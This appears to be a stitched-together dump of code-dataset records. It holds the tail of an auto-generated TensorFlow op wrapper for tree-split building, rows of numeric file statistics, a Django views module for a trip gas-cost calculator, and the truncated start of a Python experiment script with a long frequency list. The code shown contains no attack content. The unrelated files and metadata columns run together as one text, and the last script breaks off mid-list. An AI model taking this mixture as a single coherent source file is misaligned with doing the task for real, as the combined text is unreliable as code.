partition_ids=partition_ids, bucket_ids=bucket_ids,
gradients=gradients, hessians=hessians,
bucket_boundaries=bucket_boundaries, class_id=class_id,
feature_column_group_id=feature_column_group_id,
l1_regularization=l1_regularization,
l2_regularization=l2_regularization,
tree_complexity_regularization=tree_complexity_regularization,
min_node_weight=min_node_weight,
multiclass_strategy=multiclass_strategy, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = ("feature_column_group_id",
_op.get_attr("feature_column_group_id"), "l1_regularization",
_op.get_attr("l1_regularization"), "l2_regularization",
_op.get_attr("l2_regularization"),
"tree_complexity_regularization",
_op.get_attr("tree_complexity_regularization"),
"min_node_weight", _op.get_attr("min_node_weight"),
"multiclass_strategy", _op.get_attr("multiclass_strategy"))
else:
num_minibatches = _ops.convert_to_tensor(num_minibatches, _dtypes.int64)
partition_ids = _ops.convert_to_tensor(partition_ids, _dtypes.int32)
bucket_ids = _ops.convert_to_tensor(bucket_ids, _dtypes.int64)
gradients = _ops.convert_to_tensor(gradients, _dtypes.float32)
hessians = _ops.convert_to_tensor(hessians, _dtypes.float32)
bucket_boundaries = _ops.convert_to_tensor(bucket_boundaries, _dtypes.float32)
class_id = _ops.convert_to_tensor(class_id, _dtypes.int32)
_inputs_flat = [num_minibatches, partition_ids, bucket_ids, gradients, hessians, bucket_boundaries, class_id]
_attrs = ("feature_column_group_id", feature_column_group_id,
"l1_regularization", l1_regularization, "l2_regularization",
l2_regularization, "tree_complexity_regularization",
tree_complexity_regularization, "min_node_weight",
min_node_weight, "multiclass_strategy", multiclass_strategy)
_result = _execute.execute(b"BuildDenseInequalitySplits", 3,
inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
name=name)
_execute.record_gradient(
"BuildDenseInequalitySplits", _inputs_flat, _attrs, _result, name)
_result = _BuildDenseInequalitySplitsOutput._make(_result)
return _result
_build_sparse_inequality_splits_outputs = ["output_partition_ids", "gains",
"split_infos"]
_BuildSparseInequalitySplitsOutput = _collections.namedtuple(
"BuildSparseInequalitySplits", _build_sparse_inequality_splits_outputs)
def build_sparse_inequality_splits(num_minibatches, partition_ids, bucket_ids, gradients, hessians, bucket_boundaries, class_id, feature_column_group_id, bias_feature_id, l1_regularization, l2_regularization, tree_complexity_regularization, min_node_weight, multiclass_strategy, name=None):
r"""Find the split that has the best gain for the accumulated stats.
Args:
num_minibatches: A `Tensor` of type `int64`.
A scalar, the number of times per example gradients & hessians
were accumulated. The stats are divided by this to get per example stats.
partition_ids: A `Tensor` of type `int32`.
A rank 1 tensor of partition IDs.
bucket_ids: A `Tensor` of type `int64`. A rank 1 tensor of buckets IDs.
gradients: A `Tensor` of type `float32`. A rank 1 tensor of gradients.
hessians: A `Tensor` of type `float32`. A rank 1 tensor of hessians.
bucket_boundaries: A `Tensor` of type `float32`.
A rank 1 tensor, thresholds that were used for bucketization.
class_id: A `Tensor` of type `int32`.
feature_column_group_id: An `int`.
bias_feature_id: An `int`.
l1_regularization: A `float`.
l2_regularization: A `float`.
tree_complexity_regularization: A `float`.
min_node_weight: A `float`.
multiclass_strategy: An `int`.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (output_partition_ids, gains, split_infos).
output_partition_ids: A `Tensor` of type `int32`. A rank 1 tensor, the partition IDs that we created splits
for.
gains: A `Tensor` of type `float32`. A rank 1 tensor, for the computed gain for the created splits.
split_infos: A `Tensor` of type `string`. A rank 1 tensor of serialized protos which contains the
`SplitInfo`s.
"""
feature_column_group_id = _execute.make_int(feature_column_group_id, "feature_column_group_id")
bias_feature_id = _execute.make_int(bias_feature_id, "bias_feature_id")
l1_regularization = _execute.make_float(l1_regularization, "l1_regularization")
l2_regularization = _execute.make_float(l2_regularization, "l2_regularization")
tree_complexity_regularization = _execute.make_float(tree_complexity_regularization, "tree_complexity_regularization")
min_node_weight = _execute.make_float(min_node_weight, "min_node_weight")
multiclass_strategy = _execute.make_int(multiclass_strategy, "multiclass_strategy")
_ctx = _context.context()
if _ctx.in_graph_mode():
_, _, _op = _op_def_lib._apply_op_helper(
"BuildSparseInequalitySplits", num_minibatches=num_minibatches,
partition_ids=partition_ids, bucket_ids=bucket_ids,
gradients=gradients, hessians=hessians,
bucket_boundaries=bucket_boundaries, class_id=class_id,
feature_column_group_id=feature_column_group_id,
bias_feature_id=bias_feature_id, l1_regularization=l1_regularization,
l2_regularization=l2_regularization,
tree_complexity_regularization=tree_complexity_regularization,
min_node_weight=min_node_weight,
multiclass_strategy=multiclass_strategy, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = ("feature_column_group_id",
_op.get_attr("feature_column_group_id"), "bias_feature_id",
_op.get_attr("bias_feature_id"), "l1_regularization",
_op.get_attr("l1_regularization"), "l2_regularization",
_op.get_attr("l2_regularization"),
"tree_complexity_regularization",
_op.get_attr("tree_complexity_regularization"),
"min_node_weight", _op.get_attr("min_node_weight"),
"multiclass_strategy", _op.get_attr("multiclass_strategy"))
else:
num_minibatches = _ops.convert_to_tensor(num_minibatches, _dtypes.int64)
partition_ids = _ops.convert_to_tensor(partition_ids, _dtypes.int32)
bucket_ids = _ops.convert_to_tensor(bucket_ids, _dtypes.int64)
gradients = _ops.convert_to_tensor(gradients, _dtypes.float32)
hessians = _ops.convert_to_tensor(hessians, _dtypes.float32)
bucket_boundaries = _ops.convert_to_tensor(bucket_boundaries, _dtypes.float32)
class_id = _ops.convert_to_tensor(class_id, _dtypes.int32)
_inputs_flat = [num_minibatches, partition_ids, bucket_ids, gradients, hessians, bucket_boundaries, class_id]
_attrs = ("feature_column_group_id", feature_column_group_id,
"bias_feature_id", bias_feature_id, "l1_regularization",
l1_regularization, "l2_regularization", l2_regularization,
"tree_complexity_regularization",
tree_complexity_regularization, "min_node_weight",
min_node_weight, "multiclass_strategy", multiclass_strategy)
_result = _execute.execute(b"BuildSparseInequalitySplits", 3,
inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
name=name)
_execute.record_gradient(
"BuildSparseInequalitySplits", _inputs_flat, _attrs, _result, name)
_result = _BuildSparseInequalitySplitsOutput._make(_result)
return _result
def _InitOpDefLibrary(op_list_proto_bytes):
op_list = _op_def_pb2.OpList()
op_list.ParseFromString(op_list_proto_bytes)
_op_def_registry.register_op_list(op_list)
op_def_lib = _op_def_library.OpDefLibrary()
op_def_lib.add_op_list(op_list)
return op_def_lib
# op {
# name: "BuildCategoricalEqualitySplits"
# input_arg {
# name: "num_minibatches"
# type: DT_INT64
# }
# input_arg {
# name: "partition_ids"
# type: DT_INT32
# }
# input_arg {
# name: "feature_ids"
# type: DT_INT64
# }
# input_arg {
# name: "gradients"
# type: DT_FLOAT
# }
# input_arg {
# name: "hessians"
# type: DT_FLOAT
# }
# input_arg {
# name: "class_id"
# type: DT_INT32
# }
# output_arg {
# name: "output_partition_ids"
# type: DT_INT32
# }
# output_arg {
# name: "gains"
# type: DT_FLOAT
# }
# output_arg {
# name: "split_infos"
# type: DT_STRING
# }
# attr {
# name: "feature_column_group_id"
# type: "int"
# }
# attr {
# name: "bias_feature_id"
# type: "int"
# }
# attr {
# name: "l1_regularization"
# type: "float"
# }
# attr {
# name: "l2_regularization"
# type: "float"
# }
# attr {
# name: "tree_complexity_regularization"
# type: "float"
# }
# attr {
# name: "min_node_weight"
# type: "float"
# }
# attr {
# name: "multiclass_strategy"
# type: "int"
# }
# }
# op {
# name: "BuildDenseInequalitySplits"
# input_arg {
# name: "num_minibatches"
# type: DT_INT64
# }
# input_arg {
# name: "partition_ids"
# type: DT_INT32
# }
# input_arg {
# name: "bucket_ids"
# type: DT_INT64
# }
# input_arg {
# name: "gradients"
# type: DT_FLOAT
# }
# input_arg {
# name: "hessians"
# type: DT_FLOAT
# }
# input_arg {
# name: "bucket_boundaries"
# type: DT_FLOAT
# }
# input_arg {
# name: "class_id"
# type: DT_INT32
# }
# output_arg {
# name: "output_partition_ids"
# type: DT_INT32
# }
# output_arg {
# name: "gains"
# type: DT_FLOAT
# }
# output_arg {
# name: "split_infos"
# type: DT_STRING
# }
# attr {
# name: "feature_column_group_id"
# type: "int"
# }
# attr {
# name: "l1_regularization"
# type: "float"
# }
# attr {
# name: "l2_regularization"
# type: "float"
# }
# attr {
# name: "tree_complexity_regularization"
# type: "float"
# }
# attr {
# name: "min_node_weight"
# type: "float"
# }
# attr {
# name: "multiclass_strategy"
# type: "int"
# }
# }
# op {
# name: "BuildSparseInequalitySplits"
# input_arg {
# name: "num_minibatches"
# type: DT_INT64
# }
# input_arg {
# name: "partition_ids"
# type: DT_INT32
# }
# input_arg {
# name: "bucket_ids"
# type: DT_INT64
# }
# input_arg {
# name: "gradients"
# type: DT_FLOAT
# }
# input_arg {
# name: "hessians"
# type: DT_FLOAT
# }
# input_arg {
# name: "bucket_boundaries"
# type: DT_FLOAT
# }
# input_arg {
# name: "class_id"
# type: DT_INT32
# }
# output_arg {
# name: "output_partition_ids"
# type: DT_INT32
# }
# output_arg {
# name: "gains"
# type: DT_FLOAT
# }
# output_arg {
# name: "split_infos"
# type: DT_STRING
# }
# attr {
# name: "feature_column_group_id"
# type: "int"
# }
# attr {
# name: "bias_feature_id"
# type: "int"
# }
# attr {
# name: "l1_regularization"
# type: "float"
# }
# attr {
# name: "l2_regularization"
# type: "float"
# }
# attr {
# name: "tree_complexity_regularization"
# type: "float"
# }
# attr {
# name: "min_node_weight"
# type: "float"
# }
# attr {
# name: "multiclass_strategy"
# type: "int"
# }
# }
_op_def_lib = _InitOpDefLibrary(b"\n\211\003\n\036BuildCategoricalEqualitySplits\022\023\n\017num_minibatches\030\t\022\021\n\rpartition_ids\030\003\022\017\n\013feature_ids\030\t\022\r\n\tgradients\030\001\022\014\n\010hessians\030\001\022\014\n\010class_id\030\003\032\030\n\024output_partition_ids\030\003\032\t\n\005gains\030\001\032\017\n\013split_infos\030\007\"\036\n\027feature_column_group_id\022\003int\"\026\n\017bias_feature_id\022\003int\"\032\n\021l1_regularization\022\005float\"\032\n\021l2_regularization\022\005float\"\'\n\036tree_complexity_regularization\022\005float\"\030\n\017min_node_weight\022\005float\"\032\n\023multiclass_strategy\022\003int\n\203\003\n\032BuildDenseInequalitySplits\022\023\n\017num_minibatches\030\t\022\021\n\rpartition_ids\030\003\022\016\n\nbucket_ids\030\t\022\r\n\tgradients\030\001\022\014\n\010hessians\030\001\022\025\n\021bucket_boundaries\030\001\022\014\n\010class_id\030\003\032\030\n\024output_partition_ids\030\003\032\t\n\005gains\030\001\032\017\n\013split_infos\030\007\"\036\n\027feature_column_group_id\022\003int\"\032\n\021l1_regularization\022\005float\"\032\n\021l2_regularization\022\005float\"\'\n\036tree_complexity_regularization\022\005float\"\030\n\017min_node_weight\022\005float\"\032\n\023multiclass_strategy\022\003int\n\234\003\n\033BuildSparseInequalitySplits\022\023\n\017num_minibatches\030\t\022\021\n\rpartition_ids\030\003\022\016\n\nbucket_ids\030\t\022\r\n\tgradients\030\001\022\014\n\010hessians\030\001\022\025\n\021bucket_boundaries\030\001\022\014\n\010class_id\030\003\032\030\n\024output_partition_ids\030\003\032\t\n\005gains\030\001\032\017\n\013split_infos\030\007\"\036\n\027feature_column_group_id\022\003int\"\026\n\017bias_feature_id\022\003int\"\032\n\021l1_regularization\022\005float\"\032\n\021l2_regularization\022\005float\"\'\n\036tree_complexity_regularization\022\005float\"\030\n\017min_node_weight\022\005float\"\032\n\023multiclass_strategy\022\003int")
| 43.669941
| 1,968
| 0.716619
| 2,797
| 22,228
| 5.315338
| 0.07508
| 0.036322
| 0.034102
| 0.048429
| 0.902132
| 0.865676
| 0.85942
| 0.854039
| 0.847447
| 0.839914
| 0
| 0.047519
| 0.183912
| 22,228
| 508
| 1,969
| 43.755906
| 0.772051
| 0.336018
| 0
| 0.713542
| 1
| 0.010417
| 0.227466
| 0.154799
| 0
| 0
| 0
| 0
| 0
| 1
| 0.020833
| false
| 0
| 0.057292
| 0
| 0.098958
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
d5eb735a01ea9b0c9c860412faeaf0d2690955b4
| 9,407
|
py
|
Python
|
costcalculator/views.py
|
connor-c/Trip-Gas-Cost-Calculator
|
6101093ffd48b6cb6c4f847b8c1f40351617750b
|
[
"MIT"
] | null | null | null |
costcalculator/views.py
|
connor-c/Trip-Gas-Cost-Calculator
|
6101093ffd48b6cb6c4f847b8c1f40351617750b
|
[
"MIT"
] | 8
|
2020-02-11T23:59:35.000Z
|
2022-02-10T07:16:43.000Z
|
costcalculator/views.py
|
connor-c/Trip-Gas-Cost-Calculator
|
6101093ffd48b6cb6c4f847b8c1f40351617750b
|
[
"MIT"
] | null | null | null |
from django.shortcuts import render, redirect
from costcalculator.forms import *
from .distance import get_distance
def index(request):
if request.method == 'POST':
origin = OriginForm(request.POST)
destination = DestinationForm(request.POST)
gas_price = GasPriceForm(request.POST)
mpg = MpgForm(request.POST)
num_people = NumPeopleForm(request.POST)
if origin.is_valid() and destination.is_valid() and gas_price.is_valid() and mpg.is_valid() and num_people.is_valid():
forms = {'origin': origin.cleaned_data['origin_address'],
'destination': destination.cleaned_data['destination_address'],
'gas_price': gas_price.cleaned_data['gas_price'],
'mpg': mpg.cleaned_data['mpg'],
'num_people': num_people.cleaned_data['num_people']}
request.session['completed_forms'] = forms
return redirect('calculated_addresses/')
else:
if not origin.is_valid():
origin = OriginForm(request.GET)
if not destination.is_valid():
destination = DestinationForm(request.GET)
if not gas_price.is_valid():
gas_price = GasPriceForm(request.GET)
if not mpg.is_valid():
mpg = MpgForm(request.GET)
if not num_people.is_valid():
num_people = NumPeopleForm(initial={'num_people':1})
return render(request, 'costcalculator/index.html', {'origin':origin,
'destination':destination,
'gas_price':gas_price,
'mpg':mpg,
'num_people':num_people})
else:
origin = OriginForm(request.GET)
destination = DestinationForm(request.GET)
gas_price = GasPriceForm(request.GET)
mpg = MpgForm(request.GET)
num_people = NumPeopleForm(initial={'num_people':1})
return render(request, 'costcalculator/index.html', {'origin':origin,
'destination':destination,
'gas_price':gas_price,
'mpg':mpg,
'num_people':num_people})
def calculated(request):
completed_forms = request.session.get('completed_forms')
if request.method == 'POST':
origin = OriginForm(request.POST)
destination = DestinationForm(request.POST)
gas_price = GasPriceForm(request.POST)
mpg = MpgForm(request.POST)
num_people = NumPeopleForm(request.POST)
if origin.is_valid() and destination.is_valid() and gas_price.is_valid() and mpg.is_valid() and num_people.is_valid():
completed_forms = {'origin': origin.cleaned_data['origin_address'],
'destination': destination.cleaned_data['destination_address'],
'gas_price': gas_price.cleaned_data['gas_price'],
'mpg': mpg.cleaned_data['mpg'],
'num_people': num_people.cleaned_data['num_people']}
request.session['completed_forms'] = completed_forms
try:
distance = get_distance(completed_forms['origin'], completed_forms['destination'])
except KeyError:
distance = None
trip_cost = 'Distance Calculation Error, Please Try Again.'
cost_per_person = 'Distance Calculation Error, Please Try Again.'
if distance is not None:
trip_cost = round((distance / completed_forms['mpg']) * completed_forms['gas_price'], 2)
cost_per_person = '$' + str(round(trip_cost / completed_forms['num_people'], 2))
distance = str(round(distance, 1)) + ' miles'
trip_cost = '$' + str(trip_cost)
else:
distance = 'Distance Calculation Error, Please Try Again.'
origin = OriginForm(initial={'origin_address':completed_forms['origin']})
destination = DestinationForm(initial={'destination_address':completed_forms['destination']})
gas_price = GasPriceForm(initial={'gas_price':completed_forms['gas_price']})
mpg = MpgForm(initial={'mpg':completed_forms['mpg']})
num_people = NumPeopleForm(initial={'num_people':completed_forms['num_people']})
return render(request, 'costcalculator/calculated_addresses.html', {'origin':origin,
'destination':destination,
'gas_price':gas_price,
'mpg':mpg,
'num_people':num_people,
'distance':distance,
'trip_cost':trip_cost,
'cost_per_person': cost_per_person})
def use_distance(request):
if request.method == 'POST':
distance = DistanceForm(request.POST)
gas_price = GasPriceForm(request.POST)
mpg = MpgForm(request.POST)
num_people = NumPeopleForm(request.POST)
if distance.is_valid() and gas_price.is_valid() and mpg.is_valid() and num_people.is_valid():
forms = {'distance': distance.cleaned_data['distance'],
'gas_price': gas_price.cleaned_data['gas_price'],
'mpg': mpg.cleaned_data['mpg'],
'num_people': num_people.cleaned_data['num_people']}
request.session['completed_forms'] = forms
return redirect('../calculated_distance/')
else:
if not distance.is_valid():
distance = DistanceForm(request.GET)
if not gas_price.is_valid():
gas_price = GasPriceForm(request.GET)
if not mpg.is_valid():
mpg = MpgForm(request.GET)
if not num_people.is_valid():
num_people = NumPeopleForm(initial={'num_people':1})
return render(request, 'costcalculator/use_distance.html', {'distance':distance,
'gas_price':gas_price,
'mpg':mpg,
'num_people':num_people})
else:
distance = DistanceForm(request.GET)
gas_price = GasPriceForm(request.GET)
mpg = MpgForm(request.GET)
num_people = NumPeopleForm(initial={'num_people':1})
return render(request, 'costcalculator/use_distance.html', {'distance':distance,
'gas_price':gas_price,
'mpg':mpg,
'num_people':num_people})
def calculated_distance(request):
completed_forms = request.session.get('completed_forms')
if request.method == 'POST':
distance = DistanceForm(request.POST)
gas_price = GasPriceForm(request.POST)
mpg = MpgForm(request.POST)
num_people = NumPeopleForm(request.POST)
if distance.is_valid() and gas_price.is_valid() and mpg.is_valid() and num_people.is_valid():
completed_forms = {'distance': distance.cleaned_data['distance'],
'gas_price': gas_price.cleaned_data['gas_price'],
'mpg': mpg.cleaned_data['mpg'],
'num_people': num_people.cleaned_data['num_people']}
request.session['completed_forms'] = completed_forms
trip_cost = round((completed_forms['distance'] / completed_forms['mpg']) * completed_forms['gas_price'], 2)
cost_per_person = '$' + str(round(trip_cost / completed_forms['num_people'], 2))
calculated_distance = str(round(completed_forms['distance'], 1)) + ' miles'
trip_cost = '$' + str(trip_cost)
distance = DistanceForm(initial={'distance':completed_forms['distance']})
gas_price = GasPriceForm(initial={'gas_price':completed_forms['gas_price']})
mpg = MpgForm(initial={'mpg':completed_forms['mpg']})
num_people = NumPeopleForm(initial={'num_people':completed_forms['num_people']})
return render(request, 'costcalculator/calculated_distance.html', {'gas_price':gas_price,
'mpg':mpg,
'num_people':num_people,
'distance':distance,
'calculated_distance':calculated_distance,
'trip_cost':trip_cost,
'cost_per_person':cost_per_person})
| 52.553073
| 126
| 0.524928
| 854
| 9,407
| 5.526932
| 0.0726
| 0.095339
| 0.029661
| 0.033898
| 0.822881
| 0.819915
| 0.795763
| 0.795763
| 0.78178
| 0.78178
| 0
| 0.001695
| 0.372914
| 9,407
| 178
| 127
| 52.848315
| 0.79844
| 0
| 0
| 0.771812
| 0
| 0
| 0.144042
| 0.025194
| 0
| 0
| 0
| 0
| 0
| 1
| 0.026846
| false
| 0
| 0.020134
| 0
| 0.100671
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9134ea1591aaa49ad44f171a6aa4e29f6c124f0c
| 41,836
|
py
|
Python
|
experiment_1_5(Geolife_pert_2).py
|
MeetSiddhartha/spatialPatternLocationPert
|
96d3afbdeb9630ccdb9bddc199d9bcaceaf42b61
|
[
"Apache-2.0"
] | 4
|
2020-09-14T13:36:58.000Z
|
2022-02-20T12:29:35.000Z
|
experiment_1_5(Geolife_pert_2).py
|
MeetSiddhartha/spatialPatternLocationPert
|
96d3afbdeb9630ccdb9bddc199d9bcaceaf42b61
|
[
"Apache-2.0"
] | 1
|
2021-05-21T02:25:34.000Z
|
2021-05-21T02:26:05.000Z
|
experiment_1_5(Geolife_pert_2).py
|
MeetSiddhartha/spatialPatternLocationPert
|
96d3afbdeb9630ccdb9bddc199d9bcaceaf42b61
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
import time
import matplotlib.pyplot as plt
import seaborn as sns
import random
import perturbation_tool
from scipy.stats import wasserstein_distance
def main ():
JS_multiTimes_Laplace = []
JS_multiTimes_distPreserving = []
dimension = 100
round_number = 2
for round_count in range(round_number):
print("第几轮了:",round_count)
JS_Laplace = []
JS_distPreserving = []
np.random.seed(int(time.time()))
proportion_list = [10,15,20,25,30,35,40,45,50,55,60,65,70,75,80,85,90,95,100]
for proportion in proportion_list:
print('proportion:', proportion,'%')
frequency_1 = [0, 0, 0, 0, 0, 0, 0, 0, 3, 16, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 414, 0, 0, 0, 0, 0, 0, 4, 2, 0, 0, 0, 0, 0, 0, 0, 0, 4, 12, 0, 0, 0, 0, 0, 0, 0, 0, 0, 166, 0, 0, 0, 0, 372, 0, 0, 0, 0, 0, 0, 5, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 19, 21, 0, 77, 22, 1, 62, 0, 0, 100, 56, 30, 117, 33, 3, 4, 0, 0, 0, 104, 0, 0, 0, 0, 28, 30, 14, 0, 0, 0, 0, 0, 0, 0, 2, 14, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 281, 159, 0, 0, 0, 0, 0, 0, 3, 5, 2, 4, 4, 1, 0, 0, 0, 5, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 97, 0, 0, 0, 396, 205, 0, 0, 0, 0, 1, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 12, 24, 49, 68, 21, 0, 36, 54, 44, 173, 27, 0, 22, 0, 0, 0, 4, 2, 0, 0, 0, 0, 0, 0, 0, 0, 15, 29, 0, 0, 0, 0, 0, 0, 0, 6, 13, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 403, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 3, 2, 0, 0, 2, 4, 0, 0, 0, 0, 0, 0, 0, 0, 65, 93, 0, 228, 538, 93, 0, 0, 0, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 6, 34, 11, 0, 6, 0, 0, 0, 0, 25, 0, 1, 28, 22, 32, 23, 0, 2, 3, 0, 0, 0, 0, 0, 0, 0, 0, 2, 30, 13, 0, 0, 0, 0, 0, 0, 9, 10, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 109, 295, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 2, 0, 0, 5, 0, 0, 0, 0, 0, 2, 0, 59, 15, 0, 53, 505, 9, 38, 26, 0, 2, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 10, 0, 32, 0, 0, 32, 15, 9, 5, 8, 26, 13, 18, 38, 5, 0, 9, 47, 29, 99, 5, 0, 0, 24, 37, 0, 0, 0, 0, 0, 16, 26, 15, 0, 0, 0, 0, 0, 11, 8, 0, 0, 0, 0, 0, 0, 0, 0, 0, 409, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 4, 4, 11, 0, 0, 0, 0, 1, 0, 11, 80, 0, 10, 615, 0, 0, 10, 80, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 10, 0, 10, 0, 4, 18, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 229, 287, 55, 43, 23, 2, 0, 0, 0, 0, 0, 0, 0, 12, 27, 21, 0, 0, 0, 0, 11, 8, 0, 0, 0, 0, 0, 0, 0, 182, 426, 327, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 5, 4, 4, 1, 0, 0, 74, 0, 0, 438, 8, 0, 0, 0, 111, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 8, 0, 12, 1, 0, 14, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 143, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 7, 30, 11, 0, 0, 0, 8, 13, 0, 0, 0, 0, 0, 0, 405, 1837, 696, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 5, 1, 0, 54, 0, 654, 223, 0, 0, 0, 0, 79, 11, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 12, 0, 0, 18, 0, 0, 14, 0, 0, 0, 0, 35, 50, 46, 41, 66, 54, 53, 62, 65, 98, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 18, 30, 1, 0, 0, 2, 29, 5, 0, 0, 0, 0, 0, 0, 676, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 7, 4, 433, 652, 115, 4, 4, 4, 4, 4, 1, 114, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 11, 0, 0, 24, 0, 0, 117, 36, 47, 86, 36, 4, 0, 0, 0, 0, 1, 0, 0, 39, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 29, 21, 0, 5, 14, 27, 0, 0, 0, 0, 0, 334, 145, 34, 32, 32, 32, 32, 8, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 38, 4, 3, 4, 591, 62, 18, 1, 0, 0, 0, 0, 0, 44, 74, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 6, 6, 0, 16, 23, 0, 0, 55, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 38, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 10, 32, 18, 0, 0, 21, 0, 0, 0, 0, 320, 46, 0, 0, 0, 0, 1, 25, 35, 40, 5, 0, 8, 38, 31, 34, 30, 2, 5, 445, 8, 0, 41, 0, 2, 738, 25, 0, 26, 20, 18, 0, 83, 128, 175, 120, 1393, 125, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 12, 0, 18, 5, 0, 0, 0, 46, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 26, 33, 2, 18, 0, 0, 0, 121, 280, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 19, 28, 0, 0, 12, 0, 37, 127, 319, 0, 0, 22, 0, 1, 711, 594, 24, 0, 0, 137, 250, 107, 0, 0, 64, 224, 100, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 12, 0, 14, 2, 0, 0, 0, 46, 2, 0, 0, 0, 76, 131, 0, 0, 0, 0, 1, 30, 17, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 6, 0, 0, 33, 43, 0, 0, 0, 30, 589, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 13, 0, 4, 518, 0, 0, 0, 28, 0, 1, 751, 26, 316, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 7, 5, 4, 15, 4, 0, 0, 0, 97, 35, 6, 33, 40, 1, 68, 0, 0, 0, 0, 0, 38, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 5, 0, 0, 0, 15, 51, 32, 34, 20, 501, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 12, 0, 34, 387, 0, 0, 30, 970, 0, 10, 495, 0, 1, 0, 0, 0, 50, 0, 0, 0, 0, 2, 5, 1, 0, 0, 0, 0, 0, 2, 0, 0, 0, 14, 0, 11, 0, 1, 2, 3, 1, 89, 0, 25, 4, 0, 0, 35, 652, 165, 0, 0, 0, 161, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 6, 0, 0, 0, 0, 9, 20, 20, 11, 210, 327, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 11, 0, 33, 337, 0, 0, 0, 142, 0, 0, 750, 185, 184, 72, 54, 0, 2, 0, 0, 0, 0, 1, 0, 2, 0, 0, 0, 3, 2, 3, 0, 0, 0, 14, 0, 15, 16, 0, 0, 0, 0, 72, 0, 0, 0, 0, 0, 0, 0, 308, 0, 0, 0, 997, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 9, 0, 0, 0, 0, 0, 0, 0, 8, 21, 741, 42, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 10, 0, 27, 340, 0, 0, 34, 204, 26, 35, 516, 0, 76, 0, 182, 0, 17, 0, 0, 0, 0, 1, 2, 7, 328, 3119, 7076, 0, 572, 468, 778, 586, 787, 3, 0, 13, 4, 0, 0, 0, 0, 72, 0, 0, 0, 0, 0, 0, 0, 298, 0, 0, 1, 43, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 9, 0, 0, 0, 0, 0, 0, 0, 8, 17, 10, 344, 336, 330, 327, 344, 487, 342, 0, 0, 0, 0, 34, 45, 52, 44, 46, 281, 480, 362, 391, 619, 328, 384, 